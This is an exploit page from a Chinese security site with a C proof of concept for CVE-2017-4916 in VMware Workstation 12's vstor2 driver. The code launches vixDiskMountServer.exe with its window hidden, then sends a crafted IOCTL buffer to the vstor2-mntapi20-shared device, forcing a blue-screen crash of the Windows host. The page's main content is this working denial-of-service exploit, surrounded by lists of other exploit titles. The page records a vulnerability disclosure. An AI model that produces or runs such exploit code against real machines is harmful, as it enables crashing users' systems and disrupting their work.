首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 VMware Workstation 12 Pro - Denial of Service 来源：@BorjaMerino 作者：Merino 发布时间：2017-06-09   /*  * Title: NULL pointer dereference vulnerability in vstor2 driver (VMware Workstation Pro/Player)  * CVE: 2017-4916 (VMSA-2017-0009)  * Author: Borja Merino (@BorjaMerino)  * Date: May 18, 2017  * Tested on: Windows 10 Pro and Windows 7 Pro (SP1) with VMware® Workstation 12 Pro (12.5.5 build-5234757)  * Affected: VMware Workstation Pro/Player 12.x  * Description: This p0c produces a BSOD by sending a specific IOCTL code to the vstor2_mntapi20_shared device  * driver due to a double call to IofCompleteRequest (generating a MULTIPLE_IRP_COMPLETE_REQUESTS bug check) */   #include "windows.h" #include "stdio.h"   void ioctl_crash() {     HANDLE hfile;     WCHAR *vstore = L"\\\\.\\vstor2-mntapi20-shared";     DWORD dummy;     char reply[0x3FDC];     hfile = CreateFileW(vstore, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);     char buf[384] = "\x80\x01\x00\x00\xc8\xdc\x00\x00\xba\xab";     DeviceIoControl(hfile, 0x2a002c, buf, 382, reply, sizeof(reply), &dummy, NULL); }   void run_vix() {     STARTUPINFO si;     PROCESS_INFORMATION pi;     RtlZeroMemory(&si, sizeof(si));     RtlZeroMemory(&pi, sizeof(pi));     si.dwFlags |= STARTF_USESHOWWINDOW;     si.wShowWindow = SW_HIDE;     DWORD createFlags = CREATE_SUSPENDED;     CreateProcess(L"C:\\Program Files (x86)\\VMware\\VMware Workstation\\vixDiskMountServer.exe", NULL, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); }   void main() {     run_vix(); //Comment this if vixDiskMountServer.exe is already running     ioctl_crash(); }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Windows UAC Protection Bypass ·Mapscrn 2.03 - Local Buffer Ov ·Mikrotik RouterOS 6.28 FTP Buf ·Apple macOS 10.12.3 / iOS < 10 ·PuTTY < 0.68 - 'ssh_agent_chan ·Apple macOS - Disk Arbitration ·Linux Kernel < 4.10.13 - 'keyc ·IPFire 2.19 - Remote Code Exec ·Linux Kernel - 'ping' Local De ·VMware vSphere Data Protection ·DC/OS Marathon UI - Docker Exp ·EFS Easy Chat Server 3.1 - Pas   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved